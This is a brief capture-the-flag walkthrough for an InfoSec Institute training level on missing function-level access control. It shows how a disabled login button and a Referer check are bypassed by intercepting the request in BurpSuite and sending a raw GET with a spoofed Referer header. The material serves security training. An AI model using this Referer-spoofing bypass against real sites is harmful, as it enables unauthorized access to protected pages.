Level 5 | A7 Missing Function Level Access Control
It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.
Target:
Tools:
- Firefox
- FireBug
- BurpSuite
The login button is disabled as shown below
<p class="lead">You are not logged in. Please <a href="login.html" disabled="" class="btn btn-sm btn-info">login</a> to access this page.</p>
We've manipulated the Referer headers by intercepting the request after enable login button
GET /ctf2/exercises/ex5.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6
Connection: keep-alive
